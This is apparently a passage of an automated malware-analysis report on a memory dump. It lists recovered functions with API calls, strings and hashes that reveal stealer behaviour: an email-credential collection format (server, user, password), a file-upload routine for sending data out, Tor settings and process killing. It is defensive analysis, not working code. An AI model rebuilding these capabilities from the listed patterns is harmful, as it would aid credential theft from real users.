Instruction Fuzzy Hash: F0214635108244BFEF224F68DC84F6E7FAAEF86348F044158E48697270CBB19D1AC760

Uniqueness

Uniqueness Score: -1.00%

Function 00C986ED, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000001,77E2EB70), ref: 00C9870D

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

wsprintfA.USER32 ref: 00C98737

Part of subcall function 00CAA1FF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CB470F), ref: 00CAA215
Part of subcall function 00CAA1FF: wsprintfA.USER32 ref: 00CAA23D
Part of subcall function 00CAA1FF: lstrlen.KERNEL32(?), ref: 00CAA24C
Part of subcall function 00CAA1FF: wsprintfA.USER32 ref: 00CAA28C
Part of subcall function 00CAA1FF: wsprintfA.USER32 ref: 00CAA2C1
Part of subcall function 00CAA1FF: memcpy.NTDLL(00000000,?,?), ref: 00CAA2CE
Part of subcall function 00CAA1FF: memcpy.NTDLL(00000008,00CB83E4,00000002,00000000,?,?), ref: 00CAA2E3
Part of subcall function 00CAA1FF: wsprintfA.USER32 ref: 00CAA306

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00C987AC

Part of subcall function 00CB5E4D: RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00CB5E63
Part of subcall function 00CB5E4D: RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00CB5E7E

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00C98794
HeapFree.KERNEL32(00000000,?), ref: 00C987A0

Strings

Content-Type: application/octet-stream, xrefs: 00C98729
Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 00C98731

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: a9fe075d95711234e1247d6387000acb04e9d26b1ba7ad032d4c34244bbb7ea0
Instruction ID: 96c120bceaa9e4cd368c5612761a6f1da030fedd6d0d060f3930616a951f8982
Opcode Fuzzy Hash: a9fe075d95711234e1247d6387000acb04e9d26b1ba7ad032d4c34244bbb7ea0
Instruction Fuzzy Hash: B2212876800249BBCF119F95DC48EDFBF79FF49744F104526F915A2120D7718A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA61ED, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,74785520,?,00000000,?,?,00CAF520,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00CA61FE

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Part of subcall function 00CA6635: memset.NTDLL ref: 00CA663D

Part of subcall function 00C97D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00CA1117), ref: 00C97D13
Part of subcall function 00C97D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00C97D71
Part of subcall function 00C97D07: lstrcpy.KERNEL32(00000000,00000000), ref: 00C97D81

lstrcpy.KERNEL32(00000038,?), ref: 00CA6239

Strings

Accept-Encoding:, xrefs: 00CA6261
User-Agent:, xrefs: 00CA626B
GET, xrefs: 00CA624D
Host:, xrefs: 00CA6257
Connection:, xrefs: 00CA6275

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 3405161297-3467890120
Opcode ID: 5d327a4c08457160bd089667e707ad1b17c4e202c47046ccfdaf133996c5f972
Instruction ID: 0dadb27ff1899fca47740b8f770fb82b1f53d019205b256a9eb56775b81922df
Opcode Fuzzy Hash: 5d327a4c08457160bd089667e707ad1b17c4e202c47046ccfdaf133996c5f972
Instruction Fuzzy Hash: E611A771600106BE8F007FA5DD4EFAE7AACEF82388B080139F500E6111CB74CA06A660

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6572, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,00CA2EC9,?), ref: 00CA65B3
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,00CA2EC9,?,00000000,?,00000000,?,?), ref: 00CA6626

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: a35485dbec675477351322a15953a213d492ce5bc9b7ff79dbc1ef45bcfe2060
Instruction ID: 9028f3b48bed605cfa034c7e85e3e7283508ece217821d1d0fe00f9a9a0ed774
Opcode Fuzzy Hash: a35485dbec675477351322a15953a213d492ce5bc9b7ff79dbc1ef45bcfe2060
Instruction Fuzzy Hash: DA11E331141615BFD7322B61AC4DF6F3F6CEB467A8F100615F602A61E1EA624C5CC7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA378, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C91791: lstrlen.KERNEL32(00000000), ref: 00C917F8
Part of subcall function 00C91791: sprintf.NTDLL ref: 00C91819

lstrlen.KERNEL32(00000000,00000000,747C81D0,00000000,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3A3
lstrlen.KERNEL32(?,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3AB

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

strcpy.NTDLL ref: 00CAA3C2
lstrcat.KERNEL32(00000000,?), ref: 00CAA3CD

Part of subcall function 00CA1250: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00CAA3DC,00000000,?,?,?,00CB4BA0,00000000,07D18D60), ref: 00CA1267

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3EA

Part of subcall function 00CA530B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00CAA3F6,00000000,?,?,00CB4BA0,00000000,07D18D60), ref: 00CA5315
Part of subcall function 00CA530B: _snprintf.NTDLL ref: 00CA5373

Strings

=, xrefs: 00CAA3E4

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: d219408e5305cc914ee15cb1286810e2cb294820447c83aa5774e2d2c3e8c868
Instruction ID: 75618a880e08200b56b464069b06b1db3a021dbcf119f1f498dddec8dab6f976
Opcode Fuzzy Hash: d219408e5305cc914ee15cb1286810e2cb294820447c83aa5774e2d2c3e8c868
Instruction Fuzzy Hash: B51106335016267F47127BB4AC89DAF369C8F877683044025FA05A7202DFB4DD06A7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00C96229, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00C9625A
wcstombs.NTDLL ref: 00C9626B

Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00C96281,00000000), ref: 00C980C8
Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00C96281,00000000), ref: 00C980D7

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 00C9628C
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9629B
CloseHandle.KERNEL32(00000000), ref: 00C962A2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C962B1
WaitForSingleObject.KERNEL32(00000000), ref: 00C962C1

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 7eb14d40f75252047c11c328b46e6e34fffb1a21528e8a8bbc7bbcdfa861a6b4
Instruction ID: 7c9801b23ea8e2e450a050f59a61bd812f3883be58578428c79edf1407f03c26
Opcode Fuzzy Hash: 7eb14d40f75252047c11c328b46e6e34fffb1a21528e8a8bbc7bbcdfa861a6b4
Instruction Fuzzy Hash: 5411BF31100A16BBEB11ABA4EC4DBAE7BADFF05745F100210F905A61E0CBB5ED58CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1E61, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00C945A1,00000000,00000000,00000000,?,?,00CB11A1,00C945A1,00000000), ref: 00CA1E7C
lstrlen.KERNEL32( | "%s" | %u,?,?,00CB11A1,00C945A1,00000000), ref: 00CA1E87
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00CA1E98

Part of subcall function 00C9AB88: GetLocalTime.KERNEL32(?,?,?,?,00CA201B,00000000,00000001), ref: 00C9AB92
Part of subcall function 00C9AB88: wsprintfA.USER32 ref: 00C9ABC5

wsprintfA.USER32 ref: 00CA1EBB

Part of subcall function 00C99A6E: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00CA1EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00C99A8C
Part of subcall function 00C99A6E: wsprintfA.USER32 ref: 00C99AAA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00CA1EEC

Strings

| "%s" | %u, xrefs: 00CA1E7E, 00CA1E83, 00CA1EB6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: 9ae8174a5511cfb06c01c26782fc889d944fb47e209743329fc3ddbbb51dc626
Instruction ID: cf4e907666ec235e5aed535faac76fee0ac986151a5b0816ac370fef691a6614
Opcode Fuzzy Hash: 9ae8174a5511cfb06c01c26782fc889d944fb47e209743329fc3ddbbb51dc626
Instruction Fuzzy Hash: 8A11A371A00109BFDB10ABA9DC48FAF7B6DEB85398F100125FC05D3161EA318E15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3BE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 00CA3C05
RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CA3C17
RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CA3C2A
lstrcmpi.KERNEL32(00CBE280,00000000), ref: 00CA3C4B
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C96BE5,00000000), ref: 00CA3C5F

Strings

Main, xrefs: 00CA3BFD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: aabaa1032842341b6f6bcba09c8eb50a136610fd4a298fb84b3466a8e709f894
Instruction ID: c3e49bd836b4f3521ca0c69e410b1c054307a5fd97542b02df286c7cbc7e9f4c
Opcode Fuzzy Hash: aabaa1032842341b6f6bcba09c8eb50a136610fd4a298fb84b3466a8e709f894
Instruction Fuzzy Hash: A6117971500209AFDB189B69DC49B9DBBACFF05769F04426AE816A3250CB349E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC747, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

lstrcpy.KERNEL32(-000000FC,00000000), ref: 00CAC781
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00C9EF96,?,?,?), ref: 00CAC793
GetTickCount.KERNEL32 ref: 00CAC79E
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00C9EF96,?,?,?), ref: 00CAC7AA
lstrcpy.KERNEL32(00000000), ref: 00CAC7C4

Strings

\Low, xrefs: 00CAC773

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 315fcb3257a7bc2a78c042e6514868f757c15e82a69e56a67ba49d0a3e851da6
Instruction ID: c775c7bde2c620d374ad4735ae37f843f1df608df3db8d981a6c47a1a0fc35f9
Opcode Fuzzy Hash: 315fcb3257a7bc2a78c042e6514868f757c15e82a69e56a67ba49d0a3e851da6
Instruction Fuzzy Hash: F601CC322016266BD2112BB9ACC8F6F7BDC9F42749F010224F610D2190CF28EE05CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA67C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 00CAA693

Part of subcall function 00CA3587: wcstombs.NTDLL ref: 00CA3645

lstrlen.KERNEL32(?,?,?,?,?,00CB08C4,?,?), ref: 00CAA6B6
lstrlen.KERNEL32(?,?,?,?,00CB08C4,?,?), ref: 00CAA6C0
memcpy.NTDLL(?,?,00004000,?,?,00CB08C4,?,?), ref: 00CAA6D1
HeapFree.KERNEL32(00000000,?,?,?,?,00CB08C4,?,?), ref: 00CAA6F3

Strings

Access-Control-Allow-Origin:, xrefs: 00CAA681

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID: Access-Control-Allow-Origin:
API String ID: 1256246205-3194369251
Opcode ID: 5339808eec1a8e2339b81e245b7d173e109beefa9d9270f8cf725f9aed7d2db4
Instruction ID: 9c0d764bbc29e28d9877f31bdfcfd8ebba8b283213e4fd6f951c16f77e6c7871
Opcode Fuzzy Hash: 5339808eec1a8e2339b81e245b7d173e109beefa9d9270f8cf725f9aed7d2db4
Instruction Fuzzy Hash: 0E118B76500205AFCB109F55EC45F5EBBB9FB863A8F244028F906E3260E731AE04EB24

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1B2B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,00CA1372,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?,00000001), ref: 00CB135A
Part of subcall function 00CB134B: mbstowcs.NTDLL ref: 00CB1376

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,00C9A164,?), ref: 00CA1B50
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA1B62
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00C9A164,?), ref: 00CA1B7F
lstrlenW.KERNEL32(00000000,?,?,00C9A164,?), ref: 00CA1B8B
HeapFree.KERNEL32(00000000,00000000,?,?,00C9A164,?), ref: 00CA1B9F

Strings

%APPDATA%\Microsoft\, xrefs: 00CA1B30

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 5a1ceeaf4bef98f76ec18935875bba9b244f25981e74d12bb1d6dd124b1c8466
Instruction ID: c2c0645652d5f3bee303cdaff54cc226ec87be2745e059da580da5a298294628
Opcode Fuzzy Hash: 5a1ceeaf4bef98f76ec18935875bba9b244f25981e74d12bb1d6dd124b1c8466
Instruction Fuzzy Hash: C2018F76101218BFD711AF98EC84FEE7BACEF05758F100120F90297160DBB09D05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1647, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(142A03F6), ref: 00CA175E
lstrlen.KERNEL32(142903F0), ref: 00CA176C

Part of subcall function 00CA50B0: lstrlen.KERNEL32(?,00000104,?,00000000,00CA1744,142D03E9,?), ref: 00CA50BB
Part of subcall function 00CA50B0: lstrcpy.KERNEL32(00000000,?), ref: 00CA50D7

Strings

POP3, xrefs: 00CA1802
SMTP, xrefs: 00CA17F4
IMAP, xrefs: 00CA1809, 00CA181B
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 00CA181C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: 6808ff6e5385fafa403e64c97bd065f931b7854ec7f7a73d654a917640fc23f3
Instruction ID: 1bd1a644c854d7d60c56f5e0091f1a9bb028201ba5881afbb5e2dc96737716ac
Opcode Fuzzy Hash: 6808ff6e5385fafa403e64c97bd065f931b7854ec7f7a73d654a917640fc23f3
Instruction Fuzzy Hash: 3571297190111AAFCF15DFA5C885AEEBBB8AF0A708F198169F915E3210D734DA40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC50E, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

GetLastError.KERNEL32(?,?,?,00001000,?,00CBE130,747DF750), ref: 00CAC58F
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00CBE130,747DF750), ref: 00CAC614
CloseHandle.KERNEL32(00000000,?,00CBE130,747DF750), ref: 00CAC62E
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,00CBE130,747DF750), ref: 00CAC663

Part of subcall function 00CA408E: RtlReAllocateHeap.NTDLL(00000000,?,?,00CA804C), ref: 00CA409E

WaitForSingleObject.KERNEL32(?,00000064,?,00CBE130,747DF750), ref: 00CAC6E5
CloseHandle.KERNEL32(F0FFC983,?,00CBE130,747DF750), ref: 00CAC70C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: fd42b81e6589b4bbba1f11947bdeb7d6889ace5fe39cb5eca0cf1b91721d6c3e
Instruction ID: 807a28df2d790c4f969b2380cd9c1555766d83f88c7679f0bdad4a4fbf14db0c
Opcode Fuzzy Hash: fd42b81e6589b4bbba1f11947bdeb7d6889ace5fe39cb5eca0cf1b91721d6c3e
Instruction Fuzzy Hash: 4E811471D0021AEFCF11DF98C984AADBBB5FF09348F248459E915AB251D730AE41EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9991D, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738f036c8646f108cd853a50a5605d4291c1019f6cf38848289d12830de9d87a
Instruction ID: c5d7e8afe25d4a59ce46d645fef07d348ab1ad5bd931bfbb22b1d520677373b9
Opcode Fuzzy Hash: 738f036c8646f108cd853a50a5605d4291c1019f6cf38848289d12830de9d87a
Instruction Fuzzy Hash: D041D2B16007059FCB209F299C89A6FB7E8FB44364F144A2DF5AAC25D0EB70D844DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0A16, Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

memset.NTDLL ref: 00CB0A61
RtlEnterCriticalSection.NTDLL(00000008), ref: 00CB0AD9
RtlLeaveCriticalSection.NTDLL(?), ref: 00CB0AF1
GetLastError.KERNEL32(00CA209D,?,?), ref: 00CB0B09
RtlEnterCriticalSection.NTDLL(?), ref: 00CB0B15
RtlLeaveCriticalSection.NTDLL(?), ref: 00CB0B24

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: 7eef2552969d690d0fc4b49b8c6a9a43d2313b5e59d896331f5d3a5b7250a580
Instruction ID: 86d2b769f4bcf126c15e40dc4f09f930c9a4ae5c8bb064365669d39461846bc9
Opcode Fuzzy Hash: 7eef2552969d690d0fc4b49b8c6a9a43d2313b5e59d896331f5d3a5b7250a580
Instruction Fuzzy Hash: CE4138B1900705EFD720DF69C884BAFBBF8FF18754F208629E959D6290D774AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C93828, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00C93842
CreateWaitableTimerA.KERNEL32(00CBE0D4,00000003,?), ref: 00C9385F
GetLastError.KERNEL32(?,?,00CA3A3F,?,?,?,00000000,?,?,?), ref: 00C93870

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938B0
SetWaitableTimer.KERNEL32(00000000,00CA3A3F,00000000,00000000,00000000,00000000,?,?,00CA3A3F,?), ref: 00C938CF
HeapFree.KERNEL32(00000000,00CA3A3F,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938E5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 1276f044b2ee3ce7ef05285ee1d6bddec57446022a73a0e2bbe91f871aad399c
Instruction ID: 06da01b98f7ef16aec2841fef012b92b6db6235251d4b71b99ebdeba6db14f27
Opcode Fuzzy Hash: 1276f044b2ee3ce7ef05285ee1d6bddec57446022a73a0e2bbe91f871aad399c
Instruction Fuzzy Hash: D5312571900289FBCF21DF99DC89EAEBBB9EB95345F208016F515A2150D7709F44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CABAE9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 00CABB28
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CABB39
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 00CABB54
GetLastError.KERNEL32 ref: 00CABB6A
HeapFree.KERNEL32(00000000,?), ref: 00CABB7C
HeapFree.KERNEL32(00000000,?), ref: 00CABB91

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 2704e201da5ba53ac7b9d6731187bee0a0eac37141e747faf8a4862970b885f0
Instruction ID: adb601168f6190be7465ae9815a04eb9988230642a1cd74f3eb6133640b3e31b
Opcode Fuzzy Hash: 2704e201da5ba53ac7b9d6731187bee0a0eac37141e747faf8a4862970b885f0
Instruction Fuzzy Hash: 45112C76901019BBCF226BA5EC48EEF7F7EEB463A4F100121F515E1061D7314E55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB291, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00CAB2B9
_strupr.NTDLL ref: 00CAB2F4
lstrlen.KERNEL32(00000000), ref: 00CAB2FC
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CAB33C
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00CAB343
GetLastError.KERNEL32 ref: 00CAB34B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 6a02722766c3a60be50b858a50a49374895f64926ecd1affe6b9ee1c251c0414
Instruction ID: efcae34fc3970d451920cba7a3c68b7203fdaabc0952570706da3dd768c98171
Opcode Fuzzy Hash: 6a02722766c3a60be50b858a50a49374895f64926ecd1affe6b9ee1c251c0414
Instruction Fuzzy Hash: DD11CEB6100206AFCF106B70AC88FAE7B6CEB89755F148515FA06D3162DFB48D48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C995DC, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

LoadLibraryA.KERNEL32(6676736D,00000000,00000001,00000014,00000020,00CB4804,00000000,00000001), ref: 00C995FC
GetProcAddress.KERNEL32(00000000,704F4349), ref: 00C9961B
GetProcAddress.KERNEL32(00000000,6C434349), ref: 00C99630
GetProcAddress.KERNEL32(00000000,6E494349), ref: 00C99646
GetProcAddress.KERNEL32(00000000,65474349), ref: 00C9965C
GetProcAddress.KERNEL32(00000000,65534349), ref: 00C99672

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
